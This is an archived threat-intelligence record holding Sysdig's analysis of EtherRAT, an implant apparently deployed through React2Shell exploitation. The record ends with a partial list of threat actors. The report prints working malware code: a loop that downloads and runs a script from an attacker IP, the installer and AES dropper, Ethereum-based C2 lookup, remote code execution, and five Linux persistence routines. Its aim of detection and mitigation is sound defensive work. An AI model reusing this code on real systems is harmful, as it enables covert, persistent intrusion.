{
	"id": "c152fbed-916e-4745-9e4b-e5e57c433314",
	"created_at": "2026-04-06T00:07:10.640766Z",
	"updated_at": "2026-04-10T03:38:19.891244Z",
	"deleted_at": null,
	"sha1_hash": "5d2bba227ea31c26a295bca051517ab9d8c9d11e",
	"title": "EtherRAT: DPRK uses novel Ethereum implant in React2Shell attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 348658,
	"plain_text": "EtherRAT: DPRK uses novel Ethereum implant in React2Shell attacks\r\nBy Sysdig Threat Research Team\r\nPublished: 2025-12-08 · Archived: 2026-04-05 17:59:01 UTC\r\nOn December 5, 2025, just two days after the public disclosure of CVE-2025-55182 – a maximum-severity\r\nremote code execution vulnerability in React Server Components (RSCs) – the Sysdig Threat Research Team\r\nhttps://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nPage 1 of 15\n\n(TRT) recovered a novel implant from a compromised Next.js application. Unlike the cryptocurrency miners and\r\ncredential stealers documented in early React2Shell exploitation, this payload, dubbed EtherRAT, represents\r\nsomething far more sophisticated. It is a persistent access implant that combines techniques from at least three\r\ndocumented campaigns into a single, previously unreported attack chain.\r\nEtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five\r\nindependent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org. This\r\ncombination of capabilities has not been previously observed in React2Shell exploitation. The Sysdig TRT’s\r\nanalysis reveals significant overlap with North Korea-linked \"Contagious Interview\" tooling, suggesting either\r\nDemocratic People's Republic of Korea (DPRK) actors have pivoted to exploiting React2Shell, or sophisticated\r\ntool-sharing is occurring between nation-state groups.\r\nThe Sysdig TRT has analyzed how this implant works, how it compares to documented React2Shell activity, and\r\nwhat defenders can do to detect it. 
Their full findings are detailed below, or navigate first to the Sysdig TRT’s\r\ndetection strategies and mitigation recommendations.\r\nOverview of React2Shell and CVE-2025-55182\r\nCVE-2025-55182 is an unsafe deserialization vulnerability in RSCs that allows unauthenticated remote code\r\nexecution via a single HTTP request. Disclosed on December 3, 2025, by security researcher Lachlan Davidson,\r\nthe vulnerability affects React 19.x and frameworks built on it, including Next.js 15.x and 16.x when using App\r\nRouter. CISA added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog on December 5, 2025.\r\nWithin hours of public disclosure, multiple security vendors documented active exploitation:\r\nChina-nexus groups (i.e., Earth Lamia, Jackpot Panda, UNC5174) deploying Cobalt Strike beacons,\r\nSliver, and Vshell backdoors\r\nOpportunistic actors installing cryptocurrency miners (primarily XMRig)\r\nCredential harvesters targeting AWS configuration files and environment variables\r\nThe payloads documented in React2Shell exploitation share common characteristics: they rely on PowerShell or\r\nshell commands, use hardcoded C2 infrastructure, and focus on immediate credential theft or cryptomining.\r\nEtherRAT differs substantially from this pattern.\r\nEnter EtherRAT: A four-stage attack chain\r\nThe attack begins with a base64-encoded shell command executed via React2Shell, which downloads and\r\nexecutes a shell script that deploys the JavaScript implant.\r\nStage | Purpose | Key Capability\r\nStage 0: Initial Access | Download and execute shell script | Retry loop with curl/wget/python3 fallback\r\nStage 1: Deployment | Download Node.js, write payloads | Legitimate runtime from nodejs.org\r\nStage 2: Dropper | Decrypt and execute main payload | AES-256-CBC decryption\r\nStage 3: Implant | Persistent backdoor access | Blockchain C2, 5x persistence, payload update\r\n
Stage 0: Initial access via base64 shell dropper\r\nThe React2Shell exploit executes a base64-encoded payload:\r\nsh -c echo \u003cbase64\u003e|base64 -d|bash\r\nWhen decoded, this reveals a persistent download loop:\r\nwhile :; do\r\n (curl -sL http://193.24.123.68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh -o ./s.sh 2\u003e/dev/null || \\\r\n wget -qO ./s.sh http://193.24.123.68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh 2\u003e/dev/null || \\\r\n python3 -c \"import urllib.request as u;open('./s.sh','wb').write(u.urlopen('http://193.24.123.68:3001/gfdsgsd\r\n [ -s ./s.sh ] \u0026\u0026 chmod +x ./s.sh \u0026\u0026 ./s.sh \u0026\u0026 break\r\n sleep 300\r\ndone\r\nThis dropper demonstrates several red flags:\r\nMultiple download methods: Tries curl, then wget, then python3 to maximize compatibility across target\r\nenvironments.\r\nRetry loop: If download fails, waits 300 seconds and retries indefinitely.\r\nSilent execution: All download commands suppress error output.\r\nSize check: Verifies the downloaded file is non-empty before execution ([ -s ./s.sh ]).\r\nObscured filename: The URL path (gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh) uses a gibberish name to avoid\r\nobvious patterns, though the keyboard-mash style suggests manual creation rather than programmatic\r\ngeneration.\r\nThe downloaded shell script (s.sh) downloads Node.js from nodejs.org, deploys the encrypted payload and\r\nobfuscated JavaScript dropper, then executes Stage 2.\r\nStage 1: Shell script deployment (s.sh)\r\nThe downloaded shell script establishes persistence infrastructure before executing the JavaScript payload. 
Here's\r\nthe deobfuscated logic:\r\n#!/bin/bash\r\nD=\"$HOME/.local/share/.05bf0e9b\"\r\nND=\"$D/.4dai8ovb\"\r\nmkdir -p \"$D\" 2\u003e/dev/null\r\n# Download Node.js runtime from official source\r\nU1=\"https://nodejs.org/dist/v20.10.0/node-v20.10.0-linux-x64.tar.gz\"\r\nU2=\"https://nodejs.org/dist/v20.10.0/node-v20.10.0-linux-x64.tar.xz\"\r\n# Try .tar.gz first, fall back to .tar.xz\r\nif curl -sL \"$U1\" -o \"${Z}.tar.gz\" || wget -q \"$U1\" -O \"${Z}.tar.gz\"; then\r\n tar -xzf \"${Z}.tar.gz\" -C \"$D\" || {\r\n # If extraction fails, try .xz format\r\n curl -sL \"$U2\" -o \"${Z}.tar.xz\" || wget -q \"$U2\" -O \"${Z}.tar.xz\"\r\n tar -xJf \"${Z}.tar.xz\" -C \"$D\"\r\n }\r\nfi\r\nmv \"$D/node-v20.10.0-linux-x64\" \"$ND\"\r\nchmod +x \"$ND/bin/node\"\r\n# Write encrypted payload and obfuscated dropper\r\necho \"\u003cbase64_encrypted_blob\u003e\" | base64 -d \u003e \"$D/.1d5j6rm2mg2d\"\r\necho \"\u003cbase64_obfuscated_js\u003e\" | base64 -d \u003e \"$D/.kxnzl4mtez.js\"\r\n# Execute dropper in background, self-delete\r\nnohup \"$ND/bin/node\" \"$D/.kxnzl4mtez.js\" \u003e/dev/null 2\u003e\u00261 \u0026\r\nrm -f \"${BASH_SOURCE[0]}\"\r\nexit 0\r\nKey observations from Stage 1:\r\nLegitimate Node.js download: Downloads Node.js v20.10.0 directly from nodejs.org, avoiding detection\r\nof bundled suspicious binaries.\r\nHidden directory structure: Uses .local/share/.05bf0e9b with randomized hex subdirectories.\r\nDual payload deployment: Writes both the encrypted blob (.1d5j6rm2mg2d) and an obfuscated JavaScript\r\ndropper (.kxnzl4mtez.js).\r\nSelf-deletion: Removes the shell script after execution to reduce forensic artifacts.\r\nSilent background execution: Uses nohup with stdout/stderr redirected to /dev/null.\r\nStage 2: Obfuscated JavaScript dropper (.kxnzl4mtez.js)\r\nThe dropper decrypts the main payload using AES-256-CBC with hardcoded key 
material:\r\nconst kb = \"cn7uRzKiMgOZ/dDxuclzgDrGKLQ7HEtEZ1Ld6k6eRsg=\"; // Base64 AES key\r\nconst ib = \"2iWxmWx4r98fhW9jIpzKXA==\"; // Base64 IV\r\nconst key = Buffer.from(kb, \"base64\");\r\nconst iv = Buffer.from(ib, \"base64\");\r\nfunction dec(h) {\r\n const k = fs.readFileSync(h);\r\n const l = crypto.createDecipheriv(\"aes-256-cbc\", key, iv);\r\n return Buffer.concat([l.update(k), l.final()]);\r\n}\r\nThe dropper reads an encrypted blob from .1d5j6rm2mg2d, decrypts it, writes the result to .7vfgycfd01.js, and\r\nspawns it using the downloaded Node.js binary located at .4dai8ovb/bin/node. Downloading the runtime from\r\nnodejs.org rather than bundling it is significant: it reduces payload size, avoids detection of suspicious embedded\r\nbinaries, and leverages trusted infrastructure while still ensuring the implant functions regardless of the target's\r\nNode.js installation status.\r\nThe dropper also initializes a state file containing a randomly generated bot ID and the payload filename:\r\nconst r = {\r\n 0: crypto.randomUUID(), // Bot ID\r\n 1: ln // Payload filename (.7vfgycfd01.js)\r\n};\r\nThis state file uses an obscured naming convention: .{md5(script_directory).slice(0,6)}.\r\nStage 3: The main implant\r\nOnce decrypted and launched, EtherRAT establishes persistent access through multiple mechanisms, detailed in\r\nthe Five Linux persistence techniques section below.\r\nBlockchain-based command and control via Ethereum smart contracts\r\nEtherRAT's most distinctive feature is its use of Ethereum smart contracts for C2 URL resolution. 
Rather than\r\nhardcoding a C2 server address, which can be blocked or seized, the malware queries an on-chain contract to\r\nretrieve the current C2 URL.\r\nSmart contract query mechanism\r\nEtherRAT queries a smart contract at address 0x22f96d61cf118efabc7c5bf3384734fad2f6ead4 using function\r\nselector 0x7d434425 with parameter 0xE941A9b283006F5163EE6B01c1f23AA5951c4C8D:\r\nconst j = \"0x22f96d61cf118efabc7c5bf3384734fad2f6ead4\"; // Contract address\r\nconst k = \"0xE941A9b283006F5163EE6B01c1f23AA5951c4C8D\"; // Lookup parameter\r\nconst B = \"0x7d434425\"; // Function selector\r\nconst C = K =\u003e {\r\n return B + K.toLowerCase().replace(\"0x\", \"\").padStart(64, \"0\");\r\n};\r\nConsensus-based resilience for RPC endpoints\r\nWhat makes this implementation unique is its use of consensus voting across nine public Ethereum remote\r\nprocedure call (RPC) endpoints:\r\nconst m = [\r\n \"https://eth.llamarpc.com\",\r\n \"https://mainnet.gateway.tenderly.co\",\r\n \"https://rpc.flashbots.net/fast\",\r\n \"https://rpc.mevblocker.io\",\r\n \"https://eth-mainnet.public.blastapi.io\",\r\n \"https://ethereum-rpc.publicnode.com\",\r\n \"https://rpc.payload.de\",\r\n \"https://eth.drpc.org\",\r\n \"https://eth.merkle.io\"\r\n];\r\nEtherRAT queries all nine endpoints in parallel, collects responses, and selects the URL returned by the majority:\r\nconst P = {};\r\nO.forEach(Q =\u003e {\r\n P[Q] = (P[Q] || 0) + 1;\r\n});\r\nreturn Object.entries(P).sort((Q, R) =\u003e R[1] - Q[1])[0][0];\r\nThis consensus mechanism protects against several attack scenarios: a single compromised RPC endpoint cannot\r\nredirect bots to a sinkhole, and researchers cannot poison C2 resolution by operating a rogue RPC node. 
EtherRAT\r\nqueries the blockchain every five minutes, allowing operators to update C2 infrastructure by modifying the smart\r\ncontract – an update that propagates to all deployed bots automatically.\r\nHow blockchain C2 improves on traditional C2\r\nTraditional C2 infrastructure can be disrupted through domain seizure, IP blocking, or takedown requests.\r\nBlockchain-based C2 eliminates these options:\r\nTraditional C2 | Blockchain C2\r\nDomain can be seized | Contract is immutable\r\nIP can be blocked | Multiple RPC endpoints\r\nHosting provider can terminate | Decentralized infrastructure\r\nSingle point of failure | Consensus prevents poisoning\r\nReversing Labs previously documented this technique in the colortoolsv2 and mimelib2 npm packages (July\r\n2025), but those implementations used a single RPC endpoint. The consensus mechanism observed here\r\nrepresents a significant evolution in operational security.\r\nC2 traffic patterns and command execution\r\nOnce EtherRAT resolves the C2 URL from the blockchain, it enters a polling loop that executes every 500\r\nmilliseconds.\r\nRequest structure\r\nEach poll constructs a randomized URL designed to blend with legitimate web traffic:\r\nconst L = p.randomBytes(4).toString(\"hex\"); // Random path segment\r\nconst M = [\"png\", \"jpg\", \"gif\", \"css\", \"ico\", \"webp\"];\r\nconst N = M[Math.floor(Math.random() * M.length)]; // Random \"file\" extension\r\nconst O = [\"id\", \"token\", \"key\", \"b\", \"q\", \"s\", \"v\"];\r\nconst P = O[Math.floor(Math.random() * O.length)]; // Random query parameter\r\n// Resulting URL pattern:\r\n// {c2_base}/api/{random}/{bot_id}/{random}.{ext}?{param}={build_id}\r\nExample request:\r\nGET /api/a8f3b2c1/c6d83cb1-a4de-443d-bd78-da925acc5f8d/d4e5f6a7.png?token=c6d83cb1-a4de-443d-bd78-da925acc5f8d\r\nHost: c2.example.com\r\nX-Bot-Server: https://c2.example.com\r\nThis URL 
structure mimics Content Delivery Network (CDN) requests for static assets – a common pattern in\r\nlegitimate web traffic that is unlikely to trigger network security alerts.\r\nCommand execution\r\nWhen the C2 server returns a response longer than 10 characters, EtherRAT treats it as JavaScript code and\r\nexecutes it immediately:\r\nconst a0 = Object.getPrototypeOf(async function () {}).constructor;\r\nconst a1 = new a0(\r\n \"require\", \"process\", \"Buffer\", \"console\", \"__dirname\", \"__filename\", \"log\",\r\n X // Response body from C2\r\n);\r\nawait a1(require, process, Buffer, console, __dirname, __filename, r);\r\nThis pattern, using the AsyncFunction constructor, is functionally equivalent to eval() but supports asynchronous\r\noperations. EtherRAT passes full Node.js primitives to the executed code, giving operators access to:\r\nPrimitive | Capability\r\nrequire | Import any Node.js module (e.g., fs, child_process, net, crypto)\r\nprocess | Environment variables, platform info, exit control\r\nBuffer | Binary data manipulation\r\n__dirname / __filename | File system context\r\nThis is a full interactive shell. Operators can execute arbitrary Node.js code with the same privileges as the\r\nimplant process.\r\nFive Linux persistence techniques used by EtherRAT\r\nEtherRAT establishes persistence through five independent mechanisms, ensuring survival across reboots and\r\nsystem maintenance:\r\n1. Systemd user service\r\nThe service file uses a random hexadecimal name (e.g., a1b2c3d4e5f6.service) and a generic description to avoid\r\ndetection. 
\r\nconst W = o.join(M, \".config\", \"systemd\", \"user\");\r\nconst X = p.randomBytes(6).toString(\"hex\");\r\nconst Y = o.join(W, X + \".service\");\r\nn.writeFileSync(Y, `[Unit]\r\nDescription=User Application Service\r\nAfter=network.target\r\n[Service]\r\nType=simple\r\nExecStart=${P}\r\nRestart=always\r\nRestartSec=30\r\n[Install]\r\nWantedBy=default.target`);\r\nR(\"systemctl --user daemon-reload\");\r\nR(\"systemctl --user enable \" + X + \".service\");\r\nR(\"systemctl --user start \" + X + \".service\");\r\n2. XDG autostart entry\r\nUsing XDG for persistence is not very common, likely due to the low percentage of Linux desktop users.\r\nHowever, EtherRAT aims for more coverage than the typical malware.\r\nconst a2 = o.join(M, \".config\", \"autostart\");\r\nconst a3 = p.randomBytes(6).toString(\"hex\");\r\nconst a4 = o.join(a2, a3 + \".desktop\");\r\nn.writeFileSync(a4, `[Desktop Entry]\r\nType=Application\r\nName=System Service\r\nExec=${P}\r\nHidden=true\r\nNoDisplay=true\r\nX-GNOME-Autostart-enabled=true`);\r\n3. Cron job\r\nAfter a reboot, this added cron job will run EtherRAT after 30 seconds, which gives time for the system to come\r\nall the way up.\r\nconst a7 = \"@reboot sleep 30 \u0026\u0026 \" + P + \" \u003e/dev/null 2\u003e\u00261 \u0026\";\r\nconst a8 = R(\"crontab -l 2\u003e/dev/null || true\", { encoding: \"utf8\" });\r\nif (!a8.includes(N)) {\r\n const a9 = a8.trim() + \"\\n\" + a7 + \"\\n\";\r\n R(\"echo \\\"\" + a9 + \"\\\" | crontab -\");\r\n}\r\n4. 
Bashrc injection\r\nThe .bashrc file is also modified so that EtherRAT will run when a user logs into the server.\r\nconst ab = o.join(M, \".bashrc\");\r\nconst ac = \"\\n# System\\n(nohup \" + P + \" \u003e/dev/null 2\u003e\u00261 \u0026) 2\u003e/dev/null\\n\";\r\nif (n.existsSync(ab)) {\r\n const ae = n.readFileSync(ab, \"utf8\");\r\n if (!ae.includes(N)) {\r\n n.appendFileSync(ab, ac);\r\n }\r\n}\r\n5. Profile injection\r\nEtherRAT tracks which persistence mechanisms were successfully installed in its state file, avoiding redundant\r\ninstallation attempts.\r\nconst af = o.join(M, \".profile\");\r\nconst ag = \"\\n# App\\n(\" + P + \" \u003e/dev/null 2\u003e\u00261 \u0026) 2\u003e/dev/null\\n\";\r\nif (n.existsSync(af)) {\r\n const ai = n.readFileSync(af, \"utf8\");\r\n if (!ai.includes(N)) {\r\n n.appendFileSync(af, ag);\r\n }\r\n}\r\nEtherRAT’s unique payload update mechanism\r\nEtherRAT includes a capability not observed in other React2Shell payloads. On first successful C2 contact, it\r\nsends its own source code to a /api/reobf/ endpoint and replaces itself with the response:\r\nconst O = n.readFileSync(N, \"utf8\"); // Read own source\r\nconst P = {\r\n code: O, // Current source code\r\n build: i // Build ID\r\n};\r\nconst Q = await fetch(s + \"/api/reobf/\" + z, {\r\n method: \"POST\",\r\n headers: { \"Content-Type\": \"application/json\" },\r\n body: JSON.stringify(P)\r\n});\r\nconst R = await Q.text();\r\nn.writeFileSync(N, R, \"utf8\"); // Overwrite self with response\r\nM[3] = Date.now(); // Record timestamp to prevent repeat\r\nAfter receiving the response, EtherRAT:\r\n1. Writes the new code to disk, overwriting itself.\r\n2. Records a timestamp in the hidden state file to prevent repeated updates.\r\n3. 
Spawns a fresh process with the updated payload.\r\n4. Exits the current process.\r\nThe endpoint name suggests re-obfuscation, but without observing actual C2 responses, the exact purpose is\r\nunclear. Possible interpretations include:\r\nRe-obfuscation: The C2 returns a functionally identical but differently obfuscated version, defeating static\r\nsignatures.\r\nPayload upgrade: The initial implant is a lightweight stager; the C2 returns mission-specific functionality.\r\nAnti-analysis: Ensures researchers who capture the initial payload don't have the operational version.\r\nActivation/licensing: The C2 validates the deployment before providing full capabilities.\r\nRegardless of intent, this one-time transformation means each deployed implant potentially diverges from the\r\noriginal payload after activation, complicating signature-based detection.\r\nThreat attribution: Comparing EtherRAT to known DPRK and China campaigns\r\nEtherRAT’s combination of techniques shows similarities to multiple documented campaigns:\r\nThe encrypted loader pattern used in EtherRAT closely matches the DPRK-affiliated BeaverTail malware used in\r\nthe Contagious Interview campaigns.\r\nNotably, while Lazarus Group and other DPRK-affiliated threat actors historically bundle Node.js with their\r\npayloads, the sample we identified downloads Node.js from the official nodejs.org distribution. This represents a\r\nsignificant evolution in tradecraft: trading a smaller payload size for reduced detection risk.\r\nThe key differences in EtherRAT:\r\n1. Delivery vector: React2Shell exploitation rather than fake job interview lures.\r\n2. C2 mechanism: Blockchain-based rather than hardcoded.\r\n3. Persistence: Significantly more aggressive than documented Contagious Interview payloads.\r\n4. 
No credential harvesting: Unlike BeaverTail/InvisibleFerret, EtherRAT contains no cryptocurrency wallet\r\ntargeting code.\r\nGoogle Threat Intelligence Group (GTIG) recently attributed the use of BeaverTail malware and blockchain-based\r\nC2 techniques to the DPRK-associated threat actor UNC5342. However, without direct code overlap, we cannot\r\nconfirm the threat actor behind EtherRAT is the same. Given some of the significant differences listed above, this\r\nmay represent shared techniques across multiple DPRK-affiliated threat groups.\r\nAlternatively, while DPRK actors may have adopted React2Shell as a new initial access vector, it’s possible\r\nanother sophisticated actor may be combining techniques from multiple documented campaigns to complicate\r\nattribution.\r\nComparison with China-Nexus React2Shell activity\r\nThe documented exploitation of React2Shell by China-affiliated threat actors differs substantially from EtherRAT:\r\nActivity | China-affiliated actors | EtherRAT\r\nInitial payload | PowerShell commands | Encrypted JavaScript\r\nC2 infrastructure | Hardcoded IPs/domains | Blockchain-resolved\r\nPersistence | Minimal (Cobalt Strike beacon) | 5 independent mechanisms\r\nPrimary tools | Cobalt Strike, Sliver, Vshell | Custom Node.js implant\r\nApparent objective | Credential theft, initial access | Long-term persistent access\r\nTraffic pattern | Known beacon signatures | Disguised as static asset requests\r\nNovel capabilities summary\r\nThe technique of downloading Node.js from the official nodejs.org distribution is noteworthy. 
Rather than\r\nbundling a potentially flagged binary, the attackers leverage a trusted source, making network-based detection\r\nmore difficult since traffic to nodejs.org is legitimate.\r\nHow to detect and mitigate EtherRAT attacks\r\nRuntime threat detection with Sysdig Secure\r\nMultiple runtime threat detection rules will trigger if EtherRAT is run on Sysdig Secure-monitored hosts,\r\nincluding:\r\nSuspicious Command Executed by Web Server\r\nBase64-encoded Python Script Execution\r\nDNS Lookup for Miner Pool Domain Detected\r\nSuspicious Cron Modification\r\nSuspicious System Service Modification\r\nModify Shell Configuration File\r\nHunting for EtherRAT network indicators\r\nMonitor for the following patterns:\r\nOutbound connections to 193.24.123.68:3001\r\nHTTP requests for paths with gibberish filenames ending in .sh\r\nDownloads from nodejs.org/dist/v20.10.0/\r\nOutbound HTTPS requests to multiple Ethereum RPC endpoints in rapid succession\r\nPOST requests to eth_call JSON-RPC method querying contract\r\n0x22f96d61cf118efabc7c5bf3384734fad2f6ead4\r\nPeriodic GET requests with randomized paths ending in static file extensions (.png, .jpg, .gif, .css, .ico,\r\n.webp)\r\nRequests containing X-Bot-Server header\r\nEtherRAT filesystem indicators\r\nEtherRAT uses randomly-generated hidden directory and file names per deployment. 
Hunt for patterns rather than\r\nspecific paths:\r\nHidden directories in $HOME/.local/share/ with random hexadecimal names (e.g., .05bf0e9b)\r\nNested hidden subdirectories containing a bin/node executable\r\nHidden .js files in user data directories\r\nSystemd user services with random hexadecimal names\r\nXDG autostart entries with Hidden=true and NoDisplay=true\r\nBashrc/profile modifications containing nohup commands launching hidden .js files\r\nIndicators of compromise for EtherRAT\r\nNote: This implant generates random directory and file names per deployment. The file artifacts listed below are\r\nfrom our analyzed sample and should be treated as examples of the naming pattern, not universal indicators of\r\ncompromise (IOCs).\r\nStaging infrastructure\r\nType | Value\r\nStaging Server | 193.24.123.68:3001\r\nPayload URL | http://193.24.123.68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh\r\nEthereum contract (static)\r\nType | Value\r\nContract Address | 0x22f96d61cf118efabc7c5bf3384734fad2f6ead4\r\nLookup Parameter | 0xE941A9b283006F5163EE6B01c1f23AA5951c4C8D\r\nFunction Selector | 0x7d434425\r\nMitigation and response recommendations\r\nOrganizations running RSCs or Next.js should take immediate action:\r\nPatch immediately: Update React to version 19.2.1 or later, and Next.js to patched versions. Rebuild and\r\nredeploy applications after updating.\r\nHunt for persistence: Check for unauthorized systemd user services, XDG autostart entries, cron jobs, and\r\nbashrc/profile modifications on any system that may have been exposed.\r\nMonitor Ethereum RPC traffic: Unusual outbound connections to public Ethereum RPC endpoints from\r\nweb application servers should be investigated.\r\nDeploy runtime detection: Signature-based detection is ineffective against malware that updates its own\r\ncode. 
Runtime threat detection is critical for identifying this class of implant.\r\nReview application logs: Search for evidence of React2Shell exploitation attempts: unusual POST\r\nrequests to RSC endpoints with malformed payloads.\r\nRotate credentials: If compromise is suspected, rotate all credentials accessible from the affected system,\r\nincluding cloud provider tokens, API keys, and SSH keys.\r\nConclusion: What EtherRAT means for React2Shell and future threats\r\nEtherRAT represents a significant evolution in React2Shell exploitation, moving beyond opportunistic\r\ncryptomining and credential theft toward persistent, stealthy access designed for long-term operations. The\r\ncombination of blockchain-based C2, aggressive multi-vector persistence, and a payload update mechanism\r\ndemonstrates a level of sophistication not previously observed in React2Shell payloads.\r\nThe overlap with DPRK \"Contagious Interview\" tooling raises important questions about attribution and tool-sharing between threat actors. Whether this represents North Korean actors pivoting to new exploitation vectors or\r\nsophisticated technique borrowing by another actor, the result is the same: defenders face a challenging new\r\nimplant that resists traditional detection and takedown methods.\r\nThe rising frequency of supply chain and framework-level vulnerabilities, from Log4Shell to React2Shell, makes\r\nruntime threat detection more critical than ever. Since attackers can now combine techniques from multiple\r\ncampaigns and dynamically modify their payloads, organizations cannot rely solely on signature-based detection\r\nor indicator blocking. 
Continuous monitoring at runtime remains the most reliable defense against this evolving\r\nthreat landscape.\r\nSource: https://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks"
	],
	"report_names": [
		"etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks"
	],
	"threat_actors": [
		{
			"id": "2137e858-a11d-4b75-ae54-3267b096a4fc",
			"created_at": "2025-06-29T02:01:56.98797Z",
			"updated_at": "2026-04-10T02:00:04.667535Z",
			"deleted_at": null,
			"main_name": "Earth Lamia",
			"aliases": [],
			"source_name": "ETDA:Earth Lamia",
			"tools": [
				"BypassBoss",
				"PULSEPACK"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b302cfdb-30c9-4dce-a968-d2398dda820d",
			"created_at": "2024-03-28T02:00:05.789775Z",
			"updated_at": "2026-04-10T02:00:03.611467Z",
			"deleted_at": null,
			"main_name": "UNC5174",
			"aliases": [
				"Uteus"
			],
			"source_name": "MISPGALAXY:UNC5174",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8bcbeb8a-111b-4ea1-a72b-5c7abd8ef132",
			"created_at": "2025-11-01T02:04:53.050049Z",
			"updated_at": "2026-04-10T02:00:03.774442Z",
			"deleted_at": null,
			"main_name": "BRONZE SNOWDROP",
			"aliases": [
				"UNC5174 "
			],
			"source_name": "Secureworks:BRONZE SNOWDROP",
			"tools": [
				"Metasploit",
				"SNOWLIGHT",
				"SUPERSHELL",
				"Sliver",
				"VShell"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
